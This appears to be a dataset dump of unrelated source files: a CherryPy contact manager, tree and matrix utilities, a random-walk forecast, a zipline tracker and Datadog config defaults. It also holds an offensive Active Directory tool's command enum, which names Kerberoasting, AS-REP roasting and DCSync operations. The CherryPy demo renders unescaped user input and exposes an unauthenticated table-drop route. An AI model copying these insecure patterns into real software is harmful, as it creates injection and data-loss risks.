email = StringCol(length=30, notNone=True, default='')
url = StringCol(length=100, notNone=True, default='')
class ContactManager:
def index(self):
contacts = Contact.select()
template = Template('\n <h2>All Contacts</h2>\n\n #for $contact in $contacts\n <a href="mailto:$contact.email">$contact.lastName, $contact.firstName</a>\n [<a href="./edit?id=$contact.id">Edit</a>]\n [<a href="./delete?id=$contact.id">Delete</a>]\n <br/>\n #end for\n\n <p>[<a href="./edit">Add new contact</a>]</p>\n ', [locals(), globals()])
return template.respond()
index.exposed = True
def edit(self, id = 0):
id = int(id)
if id > 0:
contact = Contact.get(id)
title = 'Edit Contact'
else:
contact = None
title = 'New Contact'
template = Template('\n <h2>$title</h2>\n\n <form action="./store" method="POST">\n <input type="hidden" name="id" value="$id" />\n Last Name: <input name="lastName" value="$getVar(\'contact.lastName\', \'\')" /><br/>\n First Name: <input name="firstName" value="$getVar(\'contact.firstName\', \'\')" /><br/>\n Phone: <input name="phone" value="$getVar(\'contact.phone\', \'\')" /><br/>\n Email: <input name="email" value="$getVar(\'contact.email\', \'\')" /><br/>\n URL: <input name="url" value="$getVar(\'contact.url\', \'\')" /><br/>\n <input type="submit" value="Store" />\n </form>\n ', [locals(), globals()])
return template.respond()
edit.exposed = True
def delete(self, id):
contact = Contact.get(int(id))
contact.destroySelf()
return 'Deleted. <a href="./">Return to Index</a>'
delete.exposed = True
def store(self, lastName, firstName, phone, email, url, id = None):
if id and int(id) > 0:
contact = Contact.get(int(id))
contact.set(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
else:
contact = Contact(lastName=lastName, firstName=firstName, phone=phone, email=email, url=url)
return 'Stored. <a href="./">Return to Index</a>'
store.exposed = True
def reset(self):
Contact.dropTable(True)
Contact.createTable()
Contact(firstName='Hendrik', lastName='Mans', email='hendrik@mans.de', phone='++49 89 12345678', url='http://www.mornography.de')
return 'reset completed!'
reset.exposed = True
print "If you're running this application for the first time, please go to http://localhost:8080/reset once in order to create the database!"
cherrypy.quickstart(ContactManager())
| [
"billchang.e@gmail.com"
] | billchang.e@gmail.com |
7be5c1610311e38a44408af45228a5092697cb36 | 9e765b38a03c2996e221a42c2a0dbc0fe02824cb | /general_interview_qs/serialize_deserialize_binary_tree/binary_search_tree.py | 7d69deb9bc0240ce5a5c30d0940e79d08821b1f2 | [
"Apache-2.0"
] | permissive | angelusualle/algorithms | f709b4ae0c3275cece204d5fb56fd6ec34b4683b | 86286a49db2a755bc57330cb455bcbd8241ea6be | refs/heads/main | 2023-07-02T19:25:11.720114 | 2021-08-12T16:33:00 | 2021-08-12T16:33:00 | 269,791,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | import json
class Node():
def __init__(self, value):
self.value = value
self.left_child = None
self.right_child = None
def serialize_bst(root):
return json.dumps(serialize_bst_recursive(root))
def serialize_bst_recursive(root):
return root and (root.value, serialize_bst_recursive(root.left_child), serialize_bst_recursive(root.right_child))
def deserialize_bst(data):
return deserialize_bst_recursive(json.loads(data))
def deserialize_bst_recursive(data):
if data:
root = Node(data[0])
root.left_child = deserialize_bst_recursive(data[1])
root.right_child = deserialize_bst_recursive(data[2])
return root | [
"angelusualle@gmail.com"
] | angelusualle@gmail.com |
3cce911205ad7d207806b4df38a18d5029619084 | 9b20743ec6cd28d749a4323dcbadb1a0cffb281b | /11_Time_Series_Forecasting_with_Python/08/random_walk_persistence.py | 0a9ec3767d6c6e19c7e37f6146090e3366394702 | [] | no_license | jggrimesdc-zz/MachineLearningExercises | 6e1c7e1f95399e69bba95cdfe17c4f8d8c90d178 | ee265f1c6029c91daff172b3e7c1a96177646bc5 | refs/heads/master | 2023-03-07T19:30:26.691659 | 2021-02-19T08:00:49 | 2021-02-19T08:00:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | # persistence forecasts for a random walk
from math import sqrt
from random import random
from random import seed
from sklearn.metrics import mean_squared_error
# generate the random walk
seed(1)
random_walk = list()
random_walk.append(-1 if random() < 0.5 else 1)
for i in range(1, 1000):
movement = -1 if random() < 0.5 else 1
value = random_walk[i - 1] + movement
random_walk.append(value)
# prepare dataset
train_size = int(len(random_walk) * 0.66)
train, test = random_walk[0:train_size], random_walk[train_size:]
# persistence
predictions = list()
history = train[-1]
for i in range(len(test)):
yhat = history
predictions.append(yhat)
history = test[i]
rmse = sqrt(mean_squared_error(test, predictions))
print('Persistence RMSE: %.3f' % rmse)
| [
"jgrimes@jgrimes.tech"
] | jgrimes@jgrimes.tech |
32a2d37244020f9f94575b7edd8b299c75941baa | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03131/s755210567.py | 2089454a42165092751754963ddeb69a197d66c8 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 337 | py | K, A, B = map(int, input().split())
if B - A <= 2:
print(K + 1)
else:
ans = 0
# 初回のA枚→B枚まで A-1 回かかる
rest = K - A + 1
# このときにはA枚持っている
ans += A
# 残りをすべてA枚→B枚
ans += rest // 2 * (B - A)
if rest % 2 != 0:
ans += 1
print(ans)
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
7379d7c195155642ce162043732d4f0040240093 | 3ad8887aca54daa74b1fe446cb35cd0902e1e9bd | /jackdaw/nest/ws/protocol/cmdtypes.py | dcd8aaa5c412c3cc29a7fc3200dcf7f1c5990f79 | [] | no_license | huangzccn/jackdaw | 6ea5f3f7901c1c64b469ea4c25de0e77a3fc49a2 | 1a9800152fb8f19d5db43fcd235f45f6db2e3878 | refs/heads/master | 2023-08-29T11:44:46.692776 | 2021-10-23T20:00:36 | 2021-10-23T20:00:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,745 | py | import enum
class NestOpCmd(enum.Enum):
GATHER = 'GATHER'
KERBEROAST = 'KERBEROAST'
KERBEROASTRES = 'KERBEROASTRES'
ASREPROAST = 'ASREPROAST'
ASREPROASTRES = 'ASREPROASTRES'
KERBEROSTGS = 'KERBEROSTGS'
KERBEROSTGSRES = 'KERBEROSTGSRES'
KERBEROSTGT = 'KERBEROSTGT'
KERBEROSTGTRES = 'KERBEROSTGTRES'
SMBSESSIONS = 'SMBSESSIONS'
SMBFILES = 'SMBFILES'
SMBDCSYNC = 'SMBDCSYNC'
PATHSHORTEST = 'PATHSHORTEST'
PATHDA = 'PATHDA'
GETOBJINFO = 'GETOBJINFO'
CHANGEAD = 'CHANGEAD'
LISTADS = 'LISTADS'
LISTADSRES = 'LISTADSRES'
OK = 'OK'
ERR = 'ERR'
LOG = 'LOG'
CANCEL = 'CANCEL'
TCPSCAN = 'TCPSCAN'
TCPSCANRES = 'TCPSCANRES'
PATHRES = 'PATHRES'
GATHERSTATUS = 'GATHERSTATUS'
USERRES = 'USERRES'
COMPUTERRES = 'COMPUTERRES'
SMBSESSIONRES = 'SMBSESSIONRES'
SMBSHARERES = 'SMBSHARERES'
SMBLOCALGROUPRES = 'SMBLOCALGROUPRES'
LOADAD = 'LOADAD'
GROUPRES = 'GROUPRES'
EDGERES = 'EDGERES'
EDGEBUFFRES = 'EDGEBUFFRES'
USERBUFFRES = 'USERBUFFRES'
GROUPBUFFRES = 'GROUPBUFFRES'
COMPUTERBUFFRES = 'COMPUTERBUFFRES'
SMBSHAREBUFFRES = 'SMBSHAREBUFFRES'
SMBFILERES = 'SMBFILERES'
ADDCRED = 'ADDCRED'
LISTCRED = 'LISTCRED'
GETCRED = 'GETCRED'
CREDRES = 'CREDRES'
ADDTARGET = 'ADDTARGET'
LISTTARGET = 'LISTTARGET'
GETTARGET = 'GETTARGET'
TARGETRES = 'TARGETRES'
LISTGRAPHS = 'LISTGRAPHS'
CHANGEGRAPH = 'CHANGEGRAPH'
LOADGRAPH = 'LOADGRAPH'
LISTGRAPHRES = 'LISTGRAPHRES'
LISTAGENTS = 'LISTAGENTS'
AGENT = 'AGENT'
OBJOWNED = 'OBJOWNED'
OBJHVT = 'OBJHVT'
WSNETROUTERCONNECT = 'WSNETROUTERCONNECT'
WSNETROUTERDISCONNECT = 'WSNETROUTERDISCONNECT'
NOTIFY = 'NOTIFY'
WSNETROUTER = 'WSNETROUTER'
WSNETLISTROUTERS = 'WSNETLISTROUTERS'
PATHKERB = 'PATHKERB'
PATHASREP = 'PATHASREP'
PATHOWNED = 'PATHOWNED' | [
"info@skelsec.com"
] | info@skelsec.com |
463916eb7f9d2c84f8495c3cd2cf86f69b7f2b47 | b0d0e585c82b29aaabcb141f9f54280559abac69 | /Datastructures/spiral.py | 2b6df640797337c222abd54d3fabf6c6e852253b | [] | no_license | prem1806/python-practice-files | 32a6eb7236a9779dec0fb75d3792c34533e6491c | 3f152e4b62fb7f81e5113dced06b4dc7cce4b440 | refs/heads/master | 2021-05-29T16:59:00.349844 | 2015-10-06T17:58:56 | 2015-10-06T17:58:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 866 | py | def auto(A):
m = len(A)
n = len(A[0])
T = 0
B = m - 1
L = 0
R = n - 1
direction = 0
ret = []
while T <= B and L <= R:
if (direction == 0):
for i in range(L,R+1):
ret.append(A[T][i])
T += 1
direction = 1
elif direction == 1:
for i in range(T,B+1):
ret.append(A[i][R])
R -= 1
direction = 2
elif direction == 2:
for i in range(R, L - 1, -1):
ret.append(A[B][i])
B -= 1
direction = 3
else:
for i in range(B,T-1, -1):
ret.append(A[i][L])
L += 1
direction = 0
return ret
A = [[1,2,3,4,5],[9,5,3,6,6,9,3],[1,5,3,8,6,4,2]]
print auto(A)
| [
"rohith.uppala369@gmail.com"
] | rohith.uppala369@gmail.com |
d4ed1afb2f18e5872a87afc51949c67782c4d55e | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_cams.py | 79899c97da6b6f7a5750ef111987199a2e5323fe | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py |
from xai.brain.wordbase.nouns._cam import _CAM
#calss header
class _CAMS(_CAM, ):
def __init__(self,):
_CAM.__init__(self)
self.name = "CAMS"
self.specie = 'nouns'
self.basic = "cam"
self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
7b9daa4441128b06633740c95f5e340acebeb07f | 1df4cd78ad04d241547007e307c54236efbea400 | /gateway/finance/performance/tracker.py | 8e45259e298d289af653434554dfb2fdfe08a708 | [] | no_license | dudulangaaa/gateway | c878ec6a12ba81d936b63b4126355b9fb45fde19 | a3e709f0d5d5f778b9c195368640078ce93d743a | refs/heads/master | 2021-05-01T16:05:58.922582 | 2018-02-09T04:47:35 | 2018-02-09T04:47:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,867 | py | #
# Copyright 2016 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Performance Tracking
====================
+-----------------+----------------------------------------------------+
| key | value |
+=================+====================================================+
| period_start | The beginning of the period to be tracked. datetime|
| | in pytz.utc timezone. Will always be 0:00 on the |
| | date in UTC. The fact that the time may be on the |
| | prior day in the exchange's local time is ignored |
+-----------------+----------------------------------------------------+
| period_end | The end of the period to be tracked. datetime |
| | in pytz.utc timezone. Will always be 23:59 on the |
| | date in UTC. The fact that the time may be on the |
| | next day in the exchange's local time is ignored |
+-----------------+----------------------------------------------------+
| progress | percentage of test completed |
+-----------------+----------------------------------------------------+
| capital_base | The initial capital assumed for this tracker. |
+-----------------+----------------------------------------------------+
| cumulative_perf | A dictionary representing the cumulative |
| | performance through all the events delivered to |
| | this tracker. For details see the comments on |
| | :py:meth:`PerformancePeriod.to_dict` |
+-----------------+----------------------------------------------------+
| todays_perf | A dictionary representing the cumulative |
| | performance through all the events delivered to |
| | this tracker with datetime stamps between last_open|
| | and last_close. For details see the comments on |
| | :py:meth:`PerformancePeriod.to_dict` |
| | TODO: adding this because we calculate it. May be |
| | overkill. |
+-----------------+----------------------------------------------------+
| cumulative_risk | A dictionary representing the risk metrics |
| _metrics | calculated based on the positions aggregated |
| | through all the events delivered to this tracker. |
| | For details look at the comments for |
| | :py:meth:`zipline.finance.risk.RiskMetrics.to_dict`|
+-----------------+----------------------------------------------------+
"""
from __future__ import division
import logbook
import pandas as pd
from pandas.tseries.tools import normalize_date
# from zipline.finance.performance.period import PerformancePeriod
from gateway.finance.performance.period import PerformancePeriod
from zipline.errors import NoFurtherDataError
# import zipline.finance.risk as risk
import gateway.finance.risk as risk
from . position_tracker import PositionTracker
log = logbook.Logger('Performance')
class PerformanceTracker(object):
"""
Tracks the performance of the algorithm.
"""
def __init__(self, sim_params, trading_calendar, env):
self.sim_params = sim_params
self.trading_calendar = trading_calendar
self.asset_finder = env.asset_finder
self.treasury_curves = env.treasury_curves
self.period_start = self.sim_params.start_session
self.period_end = self.sim_params.end_session
self.last_close = self.sim_params.last_close
self._current_session = self.sim_params.start_session
self.market_open, self.market_close = \
self.trading_calendar.open_and_close_for_session(
self._current_session
)
self.total_session_count = len(self.sim_params.sessions)
self.capital_base = self.sim_params.capital_base
self.emission_rate = sim_params.emission_rate
self.position_tracker = PositionTracker(
data_frequency=self.sim_params.data_frequency
)
if self.emission_rate == 'daily':
self.all_benchmark_returns = pd.Series(
index=self.sim_params.sessions
)
self.cumulative_risk_metrics = \
risk.RiskMetricsCumulative(
self.sim_params,
self.treasury_curves,
self.trading_calendar
)
elif self.emission_rate == 'minute':
self.all_benchmark_returns = pd.Series(index=pd.date_range(
self.sim_params.first_open, self.sim_params.last_close,
freq='Min')
)
self.cumulative_risk_metrics = \
risk.RiskMetricsCumulative(
self.sim_params,
self.treasury_curves,
self.trading_calendar,
create_first_day_stats=True
)
# this performance period will span the entire simulation from
# inception.
self.cumulative_performance = PerformancePeriod(
# initial cash is your capital base.
starting_cash=self.capital_base,
data_frequency=self.sim_params.data_frequency,
# the cumulative period will be calculated over the entire test.
period_open=self.period_start,
period_close=self.period_end,
# don't save the transactions for the cumulative
# period
keep_transactions=False,
keep_orders=False,
# don't serialize positions for cumulative period
serialize_positions=False,
name="Cumulative"
)
self.cumulative_performance.position_tracker = self.position_tracker
# this performance period will span just the current market day
self.todays_performance = PerformancePeriod(
# initial cash is your capital base.
starting_cash=self.capital_base,
data_frequency=self.sim_params.data_frequency,
# the daily period will be calculated for the market day
period_open=self.market_open,
period_close=self.market_close,
keep_transactions=True,
keep_orders=True,
serialize_positions=True,
name="Daily"
)
self.todays_performance.position_tracker = self.position_tracker
self.saved_dt = self.period_start
# one indexed so that we reach 100%
self.session_count = 0.0
self.txn_count = 0
self.account_needs_update = True
self._account = None
def __repr__(self):
return "%s(%r)" % (
self.__class__.__name__,
{'simulation parameters': self.sim_params})
@property
def progress(self):
if self.emission_rate == 'minute':
# Fake a value
return 1.0
elif self.emission_rate == 'daily':
return self.session_count / self.total_session_count
def set_date(self, date):
if self.emission_rate == 'minute':
self.saved_dt = date
self.todays_performance.period_close = self.saved_dt
def get_portfolio(self, performance_needs_update):
if performance_needs_update:
self.update_performance()
self.account_needs_update = True
return self.cumulative_performance.as_portfolio()
def update_performance(self):
# calculate performance as of last trade
self.cumulative_performance.calculate_performance()
self.todays_performance.calculate_performance()
def get_account(self, performance_needs_update):
if performance_needs_update:
self.update_performance()
self.account_needs_update = True
if self.account_needs_update:
self._update_account()
return self._account
def _update_account(self):
self._account = self.cumulative_performance.as_account()
self.account_needs_update = False
def to_dict(self, emission_type=None):
"""
Creates a dictionary representing the state of this tracker.
Returns a dict object of the form described in header comments.
"""
# Default to the emission rate of this tracker if no type is provided
if emission_type is None:
emission_type = self.emission_rate
_dict = {
'period_start': self.period_start,
'period_end': self.period_end,
'capital_base': self.capital_base,
'cumulative_perf': self.cumulative_performance.to_dict(),
'progress': self.progress,
'cumulative_risk_metrics': self.cumulative_risk_metrics.to_dict()
}
if emission_type == 'daily':
_dict['daily_perf'] = self.todays_performance.to_dict()
elif emission_type == 'minute':
_dict['minute_perf'] = self.todays_performance.to_dict(
self.saved_dt)
else:
raise ValueError("Invalid emission type: %s" % emission_type)
return _dict
def prepare_capital_change(self, is_interday):
self.cumulative_performance.initialize_subperiod_divider()
if not is_interday:
# Change comes in the middle of day
self.todays_performance.initialize_subperiod_divider()
def process_capital_change(self, capital_change_amount, is_interday):
self.cumulative_performance.set_current_subperiod_starting_values(
capital_change_amount)
if is_interday:
# Change comes between days
self.todays_performance.adjust_period_starting_capital(
capital_change_amount)
else:
# Change comes in the middle of day
self.todays_performance.set_current_subperiod_starting_values(
capital_change_amount)
def process_transaction(self, transaction):
self.txn_count += 1
self.cumulative_performance.handle_execution(transaction)
self.todays_performance.handle_execution(transaction)
self.position_tracker.execute_transaction(transaction)
def handle_splits(self, splits):
leftover_cash = self.position_tracker.handle_splits(splits)
if leftover_cash > 0:
self.cumulative_performance.handle_cash_payment(leftover_cash)
self.todays_performance.handle_cash_payment(leftover_cash)
def process_order(self, event):
self.cumulative_performance.record_order(event)
self.todays_performance.record_order(event)
def process_commission(self, commission):
asset = commission['asset']
cost = commission['cost']
self.position_tracker.handle_commission(asset, cost)
self.cumulative_performance.handle_commission(cost)
self.todays_performance.handle_commission(cost)
def process_close_position(self, asset, dt, data_portal):
txn = self.position_tracker. \
maybe_create_close_position_transaction(asset, dt, data_portal)
if txn:
self.process_transaction(txn)
def check_upcoming_dividends(self, next_session, adjustment_reader):
"""
Check if we currently own any stocks with dividends whose ex_date is
the next trading day. Track how much we should be payed on those
dividends' pay dates.
Then check if we are owed cash/stock for any dividends whose pay date
is the next trading day. Apply all such benefits, then recalculate
performance.
"""
if adjustment_reader is None:
return
position_tracker = self.position_tracker
held_sids = set(position_tracker.positions)
# Dividends whose ex_date is the next trading day. We need to check if
# we own any of these stocks so we know to pay them out when the pay
# date comes.
if held_sids:
cash_dividends = adjustment_reader.get_dividends_with_ex_date(
held_sids,
next_session,
self.asset_finder
)
stock_dividends = adjustment_reader. \
get_stock_dividends_with_ex_date(
held_sids,
next_session,
self.asset_finder
)
position_tracker.earn_dividends(
cash_dividends,
stock_dividends
)
net_cash_payment = position_tracker.pay_dividends(next_session)
if not net_cash_payment:
return
self.cumulative_performance.handle_dividends_paid(net_cash_payment)
self.todays_performance.handle_dividends_paid(net_cash_payment)
def handle_minute_close(self, dt, data_portal):
"""
Handles the close of the given minute in minute emission.
Parameters
__________
dt : Timestamp
The minute that is ending
Returns
_______
A minute perf packet.
"""
self.position_tracker.sync_last_sale_prices(dt, False, data_portal)
self.update_performance()
todays_date = normalize_date(dt)
account = self.get_account(False)
bench_returns = self.all_benchmark_returns.loc[todays_date:dt]
# cumulative returns
bench_since_open = (1. + bench_returns).prod() - 1
self.cumulative_risk_metrics.update(todays_date,
self.todays_performance.returns,
bench_since_open,
account.leverage)
minute_packet = self.to_dict(emission_type='minute')
return minute_packet
def handle_market_close(self, dt, data_portal):
"""
Handles the close of the given day, in both minute and daily emission.
In daily emission, also updates performance, benchmark and risk metrics
as it would in handle_minute_close if it were minute emission.
Parameters
__________
dt : Timestamp
The minute that is ending
Returns
_______
A daily perf packet.
"""
completed_session = self._current_session
if self.emission_rate == 'daily':
# this method is called for both minutely and daily emissions, but
# this chunk of code here only applies for daily emissions. (since
# it's done every minute, elsewhere, for minutely emission).
self.position_tracker.sync_last_sale_prices(dt, False, data_portal)
self.update_performance()
account = self.get_account(False)
benchmark_value = self.all_benchmark_returns[completed_session]
self.cumulative_risk_metrics.update(
completed_session,
self.todays_performance.returns,
benchmark_value,
account.leverage)
# increment the day counter before we move markers forward.
self.session_count += 1.0
# Get the next trading day and, if it is past the bounds of this
# simulation, return the daily perf packet
try:
next_session = self.trading_calendar.next_session_label(
completed_session
)
except NoFurtherDataError:
next_session = None
# Take a snapshot of our current performance to return to the
# browser.
daily_update = self.to_dict(emission_type='daily')
# On the last day of the test, don't create tomorrow's performance
# period. We may not be able to find the next trading day if we're at
# the end of our historical data
if self.market_close >= self.last_close:
return daily_update
# If the next trading day is irrelevant, then return the daily packet
if (next_session is None) or (next_session >= self.last_close):
return daily_update
# move the market day markers forward
# TODO Is this redundant with next_trading_day above?
self._current_session = next_session
self.market_open, self.market_close = \
self.trading_calendar.open_and_close_for_session(
self._current_session
)
# Roll over positions to current day.
self.todays_performance.rollover()
self.todays_performance.period_open = self.market_open
self.todays_performance.period_close = self.market_close
# Check for any dividends, then return the daily perf packet
self.check_upcoming_dividends(
next_session=next_session,
adjustment_reader=data_portal._adjustment_reader
)
return daily_update
def handle_simulation_end(self):
"""
When the simulation is complete, run the full period risk report
and send it out on the results socket.
"""
log_msg = "Simulated {n} trading days out of {m}."
log.info(log_msg.format(n=int(self.session_count),
m=self.total_session_count))
log.info("first open: {d}".format(
d=self.sim_params.first_open))
log.info("last close: {d}".format(
d=self.sim_params.last_close))
bms = pd.Series(
index=self.cumulative_risk_metrics.cont_index,
data=self.cumulative_risk_metrics.benchmark_returns_cont)
ars = pd.Series(
index=self.cumulative_risk_metrics.cont_index,
data=self.cumulative_risk_metrics.algorithm_returns_cont)
acl = self.cumulative_risk_metrics.algorithm_cumulative_leverages
risk_report = risk.RiskReport(
ars,
self.sim_params,
benchmark_returns=bms,
algorithm_leverages=acl,
trading_calendar=self.trading_calendar,
treasury_curves=self.treasury_curves,
)
return risk_report.to_dict()
| [
"xiyongjian@hotmail.com"
] | xiyongjian@hotmail.com |
d8b1f1388e4a768f0006ce3f1ac5e57574bc519b | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /time_or_world/see_long_case_under_year/early_day_or_hand.py | e5672fa966bf5cb831f37a71568f7efcaca277b6 | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 241 | py |
#! /usr/bin/env python
def early_fact(str_arg):
place_and_young_government(str_arg)
print('other_problem')
def place_and_young_government(str_arg):
print(str_arg)
if __name__ == '__main__':
early_fact('great_man_or_man')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
e5f64d8df89dd8374d572ba638269fb1af708fd3 | c9e0227c3958db89747488328bd2b255e54f008f | /solutions/0748. Shortest Completing Word/0748.py | a4b585f171fb2752d25e76439753fa102ae11038 | [] | no_license | XkhldY/LeetCode | 2deba28b7491c36b4f224c3132fb89feea318832 | 94e23db2668615d9fe09e129a96c22ae4e83b9c8 | refs/heads/main | 2023-04-03T08:17:30.743071 | 2021-04-14T23:34:03 | 2021-04-14T23:34:03 | 358,136,537 | 1 | 0 | null | 2021-04-15T05:20:21 | 2021-04-15T05:20:21 | null | UTF-8 | Python | false | false | 492 | py | class Solution:
def shortestCompletingWord(self, licensePlate: str, words: List[str]) -> str:
def isMatch(word: str) -> bool:
wordCount = Counter(word)
return False if any(wordCount[i] < count[i] for i in string.ascii_letters) else True
ans = '*' * 16
count = defaultdict(int)
for c in licensePlate:
if c.isalpha():
count[c.lower()] += 1
for word in words:
if len(word) < len(ans) and isMatch(word):
ans = word
return ans
| [
"walkccray@gmail.com"
] | walkccray@gmail.com |
082c0a3a8132415b1544e97ea72366bcceaafef0 | b5b665097ef54459d85d4cc4bf0748f885a1ccdc | /quantopian/01-api/05-orders/04-get-order-methods.py | e3f23983a8fd5f035c588315a155dafdfb17f68b | [] | no_license | dylanjorgensen/financial-engineering | 76d769723fcc4eb26601e2abab9bcb8f60a49ef3 | f66b47ee8fcc15b599eab3af5040975b1ec7add2 | refs/heads/master | 2021-01-13T07:28:43.790685 | 2016-10-19T05:18:34 | 2016-10-19T05:18:34 | 71,321,116 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 76 | py |
# You can see the status of a specific order by calling get_order(order)
| [
"dylan@dylanjorgensen.com"
] | dylan@dylanjorgensen.com |
9da8ce2b393a9e221c614b46da6993a8350023c7 | 2b0eab74af8d23244ff11699830f9bb10fbd717a | /visit_report/migrations/0051_remove_cite_steps.py | 76dc57044caf2e095a4415fa7a366948cb1549e3 | [] | no_license | alexandrenorman/mixeur | c7e25cd20b03c78b361cb40e3e359a6dc5d9b06b | 95d21cd6036a99c5f399b700a5426e9e2e17e878 | refs/heads/main | 2023-03-13T23:50:11.800627 | 2021-03-07T15:49:15 | 2021-03-07T15:49:15 | 345,384,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django.db import migrations
def remove_cite_steps(apps, schema_editor):
Steps = apps.get_model('visit_report', 'Step')
Steps.objects.filter(category="financing", milestone="work-end", nature="cite").delete()
class Migration(migrations.Migration):
dependencies = [
('visit_report', '0050_add_prime_renov_step'),
]
operations = [
migrations.RunPython(remove_cite_steps),
]
| [
"norman@xael.org"
] | norman@xael.org |
0ef74428d763b21c1f13e563f623565510db01d0 | a3c662a5eda4e269a8c81c99e229879b946a76f6 | /.venv/lib/python3.7/site-packages/pylint/test/functional/star_needs_assignment_target_py35.py | 58e43dbacb50b64cee73eb2d348f19ea84d2a1ee | [
"MIT"
] | permissive | ahmadreza-smdi/ms-shop | 0c29da82c58b243507575672bbc94fb6e8068aeb | 65ba3f3061e2ac5c63115b08dadfe7d67f645fb6 | refs/heads/master | 2023-04-27T19:51:34.858182 | 2019-11-24T20:57:59 | 2019-11-24T20:57:59 | 223,616,552 | 6 | 2 | MIT | 2023-04-21T20:51:21 | 2019-11-23T16:09:03 | Python | UTF-8 | Python | false | false | 445 | py | """
Test PEP 0448 -- Additional Unpacking Generalizations
https://www.python.org/dev/peps/pep-0448/
"""
# pylint: disable=superfluous-parens
UNPACK_TUPLE = (*range(4), 4)
UNPACK_LIST = [*range(4), 4]
UNPACK_SET = {*range(4), 4}
UNPACK_DICT = {'a': 1, **{'b': '2'}}
UNPACK_DICT2 = {**UNPACK_DICT, "x": 1, "y": 2}
UNPACK_DICT3 = {**{'a': 1}, 'a': 2, **{'a': 3}}
UNPACK_IN_COMP = {elem for elem in (*range(10))} # [star-needs-assignment-target]
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
f2e355dfe0f62b71a7bc35dd20e268a5f7c5387a | 6ceeb3adb08da8754f59a117f39d401948988f0a | /spark/datadog_checks/spark/config_models/defaults.py | 30ebbb0df826f22f540c8c68a8b26011fb804c1b | [
"BSD-3-Clause",
"BSD-3-Clause-Modification",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"LGPL-2.1-only",
"LGPL-3.0-only",
"CC0-1.0",
"Unlicense",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Smartling/integrations-core | 794c3822f05c772c7e36fdde8b68c8c3284e71e3 | 79088364600aa8f06ec38500800f3803db77feed | refs/heads/master | 2023-04-15T14:21:50.017308 | 2023-04-11T20:13:26 | 2023-04-11T20:13:26 | 159,552,127 | 0 | 1 | BSD-3-Clause | 2023-04-07T16:38:06 | 2018-11-28T19:14:55 | Python | UTF-8 | Python | false | false | 4,552 | py | # (C) Datadog, Inc. 2021-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
# This file is autogenerated.
# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:
# ddev -x validate config -s <INTEGRATION_NAME>
# ddev -x validate models -s <INTEGRATION_NAME>
from datadog_checks.base.utils.models.fields import get_default_field_value
def shared_proxy(field, value):
return get_default_field_value(field, value)
def shared_service(field, value):
return get_default_field_value(field, value)
def shared_skip_proxy(field, value):
return False
def shared_timeout(field, value):
return 10
def instance_allow_redirects(field, value):
return True
def instance_auth_token(field, value):
return get_default_field_value(field, value)
def instance_auth_type(field, value):
return 'basic'
def instance_aws_host(field, value):
return get_default_field_value(field, value)
def instance_aws_region(field, value):
return get_default_field_value(field, value)
def instance_aws_service(field, value):
return get_default_field_value(field, value)
def instance_connect_timeout(field, value):
return get_default_field_value(field, value)
def instance_disable_generic_tags(field, value):
return False
def instance_disable_legacy_cluster_tag(field, value):
return False
def instance_empty_default_hostname(field, value):
return False
def instance_enable_query_name_tag(field, value):
return False
def instance_executor_level_metrics(field, value):
return False
def instance_extra_headers(field, value):
return get_default_field_value(field, value)
def instance_headers(field, value):
return get_default_field_value(field, value)
def instance_kerberos_auth(field, value):
return 'disabled'
def instance_kerberos_cache(field, value):
return get_default_field_value(field, value)
def instance_kerberos_delegate(field, value):
return False
def instance_kerberos_force_initiate(field, value):
return False
def instance_kerberos_hostname(field, value):
return get_default_field_value(field, value)
def instance_kerberos_keytab(field, value):
return get_default_field_value(field, value)
def instance_kerberos_principal(field, value):
return get_default_field_value(field, value)
def instance_log_requests(field, value):
return False
def instance_metric_patterns(field, value):
return get_default_field_value(field, value)
def instance_metricsservlet_path(field, value):
return '/metrics/json'
def instance_min_collection_interval(field, value):
return 15
def instance_ntlm_domain(field, value):
return get_default_field_value(field, value)
